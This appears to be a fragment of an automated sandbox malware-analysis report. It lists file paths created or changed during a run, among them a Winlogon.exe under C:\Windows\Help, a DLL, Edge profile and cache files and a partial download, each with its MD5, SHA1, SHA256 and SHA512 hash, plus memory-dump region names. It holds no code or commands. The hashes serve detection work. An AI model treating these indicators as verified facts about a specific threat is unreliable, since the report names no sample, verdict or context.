SHA256 a3377ade83786c2bdff5db19ff4dbfd796da4312402b5e77c4c63e38cc6eff92
SHA512 72a2c10d7a53a7f9a319dab66d77ed65639e9aa885b551e0055fc7eaf6ef33bbf109205b42ae11555a0f292563914bc6edb63b310c6f9bda9564095f77ab9196

C:\Windows\Help\Winlogon.exe

MD5 a8ddace9435fe395325fc45dde8bd0a3
SHA1 dcf9baaa9e3a27450debf4f35112376ed005c800
SHA256 6e81d7c71b3e8d731e11ad75d3dac02a4210c9f90fac618af5c00cbce3718658
SHA512 2c6006e42ecf31da02a4584e69c0e55390be5a405353307582852728b2ceb65033f3f5cd0b6465b3a1541d19eab95c61b394e3403dee558196c2f2969d82b196

C:\Windows\Help\active_desktop_render.dll

MD5 07a36097730666fe9e5434d85a5ab989
SHA1 780ca47c15932ed1f9640c17b9bb340410a52338
SHA256 1fb4cee4d83d424e0bfcbfd97169ef717b3ebdcc5d01ba7c7c547ae606ad5c3c
SHA512 4a08080471c660856af724e4480ec721c22c462346e293d93e2f9577e6d669c6b51cd81ef96dfad943c791dfd7f7f0c2d5234a82d81ce5f1c01bb493cda34085

memory/3888-427-0x00007FF612BA0000-0x00007FF613120000-memory.dmp

memory/3888-451-0x00007FF612BA0000-0x00007FF613120000-memory.dmp

memory/4448-465-0x0000000000400000-0x00000000019AA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 37f660dd4b6ddf23bc37f5c823d1c33a
SHA1 1c35538aa307a3e09d15519df6ace99674ae428b
SHA256 4e2510a1d5a50a94fe4ce0f74932ab780758a8cbdc6d176a9ce8ab92309f26f8
SHA512 807b8b8dc9109b6f78fc63655450bf12b9a006ff63e8f29ade8899d45fdf4a6c068c5c46a3efbc4232b9e1e35d6494f00ded5cdb3e235c8a25023bfbd823992d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 d7cb450b1315c63b1d5d89d98ba22da5
SHA1 694005cd9e1a4c54e0b83d0598a8a0c089df1556
SHA256 38355fd694faf1223518e40bac1996bdceaf44191214b0a23c4334d5fb07d031
SHA512 df04d4f4b77bae447a940b28aeac345b21b299d8d26e28ecbb3c1c9e9a0e07c551e412d545c7dbb147a92c12bad7ae49ac35af021c34b88e2c6c5f7a0b65f6a8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 0d1055a071a0979c8605092c0e2abd71
SHA1 90caba3066c3fafc14c3ecdcc2621a340bfae94d
SHA256 706a2eaf2e8d892373ae7643d53c89e6b4bd9e34de07c93ce72d7f045847810d
SHA512 ec0c9e1b1a089b81742c0a08f48955462abb35ca25400e2a0b129e73f20f6d95cbcf09e776918015df3a9ade167a48b041818ae5ead032001d53e7f1ef3c91c9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 a6b5c1d78a466f8d9858a8c6890a70b2
SHA1 dc95cf6cce8357f2e1a7fcc299d632f16ba3f549
SHA256 c0b87ec1d43dc3db6c307b9e36f298cab5424a88bae1d524f12b6cc49c1cce73
SHA512 8fcbe8002ad80e70ebafcd7e01a477f0464b684cb6d9e13bcb22a92ca07de0bdbfdb504e95ccba3e56dfc31f7ad8a87afae173304dee77529f25d4609bd232bc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2870b02dd1dc3b5df0ba481312ee85ad
SHA1 5771a48f1de9904dd7ba92233a921a553c015c5f
SHA256 41fc2934bcd8509c15634adc63d4f83359c945e5418805d24ccba93c545b14f3
SHA512 2a88164e54c7811da23cdb4065a940a1595b9dc824fbb71755ade0a6c8986c3a84a976bf215e6e2ae36969c96b62eb57dda1cf3213a066c2ea74e46a41af0950

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

MD5 2e86a72f4e82614cd4842950d2e0a716
SHA1 d7b4ee0c9af735d098bff474632fc2c0113e0b9c
SHA256 c1334e604dbbffdf38e9e2f359938569afe25f7150d1c39c293469c1ee4f7b6f
SHA512 7a5fd3e3e89c5f8afca33b2d02e5440934e5186b9fa6367436e8d20ad42b211579225e73e3a685e5e763fa3f907fc4632b9425e8bd6d6f07c5c986b6556d47b1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

MD5 c813a1b87f1651d642cdcad5fca7a7d8
SHA1 0e6628997674a7dfbeb321b59a6e829d0c2f4478
SHA256 df670e09f278fea1d0684afdcd0392a83d7041585ba5996f7b527974d7d98ec3
SHA512 af0d024ba1faafbd6f950c67977ed126827180a47cea9758ee51a95d13436f753eb5a7aa12a9090048a70328f6e779634c612aebde89b06740ffd770751e1c5b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

MD5 56d57bc655526551f217536f19195495
SHA1 28b430886d1220855a805d78dc5d6414aeee6995
SHA256 f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4
SHA512 7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

MD5 b275fa8d2d2d768231289d114f48e35f
SHA1 bb96003ff86bd9dedbd2976b1916d87ac6402073
SHA256 1b36ed5c122ad5b79b8cc8455e434ce481e2c0faab6a82726910e60807f178a1
SHA512 d28918346e3fda06cd1e1c5c43d81805b66188a83e8ffcab7c8b19fe695c9ca5e05c7b9808599966df3c4cd81e73728189a131789c94df93c5b2500ce8ec8811

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7421f3dc3bca7e7da99f5596fd498037
SHA1 9bf166876952b94c3ccc23e857929bc8893740b1
SHA256 ec15ae480e6e8546236693850695b73254ea2b24b007f1ab7014836ddc665fad
SHA512 f9e6438c8975f522be23b3f90afbf2b4ed82f9fcb27ff0521835c790c668d160e5372a549fb7f7cb4b6e5e7b951b5b65696ccd734f5b595533848bc2087a8a02

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 7e896888f1dffbbfa68a56444837b439
SHA1 d25023163c43d5216d4151fcd6f66ca440f343d7
SHA256 ddeea2f0bc19336d7cb8cd2f87aee0faacefd87ff640a76b7a3284a32da8e4d8
SHA512 099bf717d6938ff3f93cd2133a7a1d09ef5b385833f59fde207208fbd1deaee7653d748ea0913c5bd7364286990839d11536a0fac97d0f8f28a25c8a988d6d21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe591b5e.TMP

MD5 1a75df0cf8a38cdb6e09aeef848801c2
SHA1 79c4c7c56decf847f8af98996922725ab9b4fa96
SHA256 d0791ca45ea1015edab4511607c50f29e0adf95ce23e104c4d133275951a78bf
SHA512 0e7363ad4d2e07ea0b91273469c789af8fe1b534a9d8679cd19076974ee2675fa63b9750234f5e932caef82721c2f756bc131f7da8571b0c60dd8c48a1011347

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b

MD5 2be38925751dc3580e84c3af3a87f98d
SHA1 8a390d24e6588bef5da1d3db713784c11ca58921
SHA256 1412046f2516b688d644ff26b6c7ef2275b6c8f132eb809bd32e118208a4ec1b
SHA512 1341ffc84f16c1247eb0e9baacd26a70c6b9ee904bc2861e55b092263613c0f09072efd174b3e649a347ef3192ae92d7807cc4f5782f8fd07389703d75c4c4e2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

MD5 9f96d459817e54de2e5c9733a9bbb010
SHA1 afbadc759b65670865c10b31b34ca3c3e000cd31
SHA256 51b37ee622ba3e2210a8175ecd99d26d3a3a9e991368d0efbb705f21ff9ac609
SHA512 aa2514018ef2e39ebde92125f5cc6fb7f778f2ab3c35d4ec3a075578fda41a76dbd7239fe2ea61533fb3262c04739c6500d1497c006f511aa3142bb2696d2307

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

MD5 e29b448723134a2db688bf1a3bf70b37
SHA1 3c8eba27ac947808101fa09bfe83723f2ab8d6b0
SHA256 349cc041df29f65fd7ffe2944a8872f66b62653bbfbd1f38ce8e6b7947f99a69
SHA512 4ce801111cb1144cfd903a94fb9630354bf91a5d46bbbe46e820c98949f57d96ec243b655f2edeb252a4ec6a80167be106d71a4b56b402be264c13cc208f3e2c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 cdf8a4727ca2841a99adea8e0c188c3c
SHA1 d3cce1e6240d95094a8a651591cf069102ae659f
SHA256 88764f2c0db9a95848272cc02c5f14923d9e3e30aefa4df817cbc94101c8519d
SHA512 6390ae2ca87cf55114209f4c06ada81e534318e24ede2fdfc145315c5cd20f9efa61b10dc6a8e8d0ff5d6f8747303017038cc50d38d9915c53167a29540d2d59

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 8f33c349a04cb08aeefbdd0b4ae513eb
SHA1 2da5557e317644ae0e38b86e1e2ae01a3bac630e
SHA256 cec1988e72fc7b1f74a63cc0d29950517527f395783289d8ba0cdf211e93f113
SHA512 c02ca655721a65bf86b784bad69f3d9c87f61b0638d03b131c2290a179c8200c0399e93cb9182c534a6affe0a6c601429a0f6e38d4ba882f2a03a00866d7b74b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 4acd7aa52d4d23faed87afd84dc86e4d
SHA1 4d4a5bd593c958184be32902b3dbf2f51437449c
SHA256 38c643957086b960a1d4b303224ce2aeeccaff63a521e329fb798d32974251d0
SHA512 a40b34fc7b8dda2a129758592a2ce83fb9e4ccc6212fb93b7ce56fd977973f6216182095609ad714387a4cea5f9dcaee69339f1f41bd91ee50615f689bbf32f7

C:\Users\Admin\Downloads\Unconfirmed 694643.crdownload

MD5 10dc710dd495e9078ce79b26e18591e0
SHA1 aef434d6b77158dd2accd746bbc727bbc3367adc
SHA256 be5389a28e952d7ab2d9447c1bdb8eb7d11b24cb02e4b18da367715c2acfdd15
SHA512 959c5cb47b9d1c21ddfe2eaac14e0c99c758aab85036705c072525e70255957abc97412ab0ceadd2adbebc1b176699614f71bf50689cf9ff97891e6216a15dc5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 fe936d5a8ca1db0d0fad682a39803be8
SHA1 c3408e1080c66bd1f7a2c5c78cc17990259523b6
SHA256 cfa4188133a9e40364d8c32f96e354c35eecb0a65df22ad974fcab1fb919b3ce
SHA512 e08bf22c7aa5b13fc4b3cf85c77f39810ad89661a33af4c50a9618064c5bed055ecdde9c4e385c344046018f249e2ea9041770e25018ca848c5e225b053c530b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 dd2caf1f2ad8e03772db28326f7351cb
SHA1 bb915775112d636a13b1a3bfc0e03fddae13202d
SHA256 92cd2d831dbdb080d30c06feef0149335202908e9475eb2b8319d5ed1f3c0a07
SHA512 3c55b40ef69a2de73a3af36c88617fcbabfe22af38344bacb3b4793ca89a749f9b5084b1bf13726e225abd60c3431b01186011aecd46bebd2599fcf1bd8bde20

C:\Windows\System32\drivers\hitmanpro37.sys

MD5 55b9678f6281ff7cb41b8994dabf9e67
SHA1 95a6a9742b4279a5a81bef3f6e994e22493bbf9f
SHA256 eb5d9df12ae2770d0e5558e8264cbb1867c618217d10b5115690ab4dcfe893c6
SHA512 d2270c13dc8212b568361f9d7d10210970b313d8cd2b944f63a626f6e7f2feb19671d3fcdbdf35e593652427521c7c18050c1181dc4c114da96db2675814ab40

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 20e7f34c44271d6cde2a092645b15dba
SHA1 86d7ebfdb069f7e0854f93fee1b7490c13b5f5a2
SHA256 f8ab4ff2e5cb6cb4be3e3806abe5449d4d3756b93f36e0225c993743c1942640
SHA512 38c0d450c41eac45eb63c123c1886690dd484f06d369dd98cb37f44237b8c802d9ce44ea5c3c342e2c5dd8740a639acdfb131131124e3f1c7a670cf335706288

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 e7fbbf59f7b19738e76605c5516db1f2
SHA1 b6b388d9e8f1c16c8cc3ee48bb39c27b9e0aefda
SHA256 3c4d4d142d4130295ac28fd97855c7d25f989dbf6ca7a90277f03619d092e762
SHA512 d335e8b4c6615a7faf5f6d7dc34864f38456a3105dc7bb5a68409cfbe05fda332bfe8547f4983172b2b332434b63a2a97b3f505638175dfdb25a3893dd4d02a7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000005

MD5 fc97b88a7ce0b008366cd0260b0321dc
SHA1 4eae02aecb04fa15f0bb62036151fa016e64f7a9
SHA256 6388415a307a208b0a43b817ccd9e5fcdda9b6939ecd20ef4c0eda1aa3a0e49e
SHA512 889a0db0eb5ad4de4279b620783964bfda8edc6b137059d1ec1da9282716fe930f8c4ebfadea7cd5247a997f8d4d2990f7b972a17106de491365e3c2d2138175

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

MD5 d2de47009fe9073bd140ecb1429e6f0d
SHA1 a1a77144c3ffe60de38eb5daecccdc7bf1d1eced
SHA256 d6eea1ffa740c7842deed381ad338175ec14fecd7ca25245342ca8930ffd0b79
SHA512 bcd47e091e7309d98c4cabeb782aaecd1e909c61b6254b78dfbb5a9bd1b2c78aac2359514322e82cff3cc7e3e2666161c4e544255495182eef694f87c2e5f409

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000001

MD5 1ac9e744574f723e217fb139ef1e86a9
SHA1 4194dce485bd10f2a030d2499da5c796dd12630f
SHA256 4564be03e04002c5f6eaeaea0aff16c5d0bbdad45359aef64f4c199cda8b195e
SHA512 b8515fb4b9470a7ce678331bbd59f44da47b627f87ea5a30d92ec1c6d583f1607539cd9318a5bccf0a0c6c2bd2637992e0519bd37acdf876f7a11ed184fb5109

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000002

MD5 a33b3a3fdf5161be5bd861804961f557
SHA1 68a57897f1686a3e62ce9808165e18f31661d077
SHA256 ac33d8bc6d9a5e769472877d7dd3d035f8088274b886b16cb1898b106da48560
SHA512 c94c29a5a9da89044504fe06702f00a7fdd5bc7b85e1733c0cc9a363a812c8d8f95672ea7731643229fa4ae2f1a632c73096d90b63799f5bae7639b41151ccb3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000003

MD5 d9ab25168f8f536fdf8f92202c6ac060
SHA1 789fa090b18ed4195528196cb8883840fb86c801
SHA256 2d4f19e670e3081e0039b061c8d80c8037605d5f8a01a9bd58c4ed1537a253c3
SHA512 04edad29dd23e2d5f5d5242cf4d98f35f71100e63eacc4ba297736a944155e96e458f1ec0c08d5cf53ab50031ba4fa06f07b1b349062ff896d8e2134afc48b79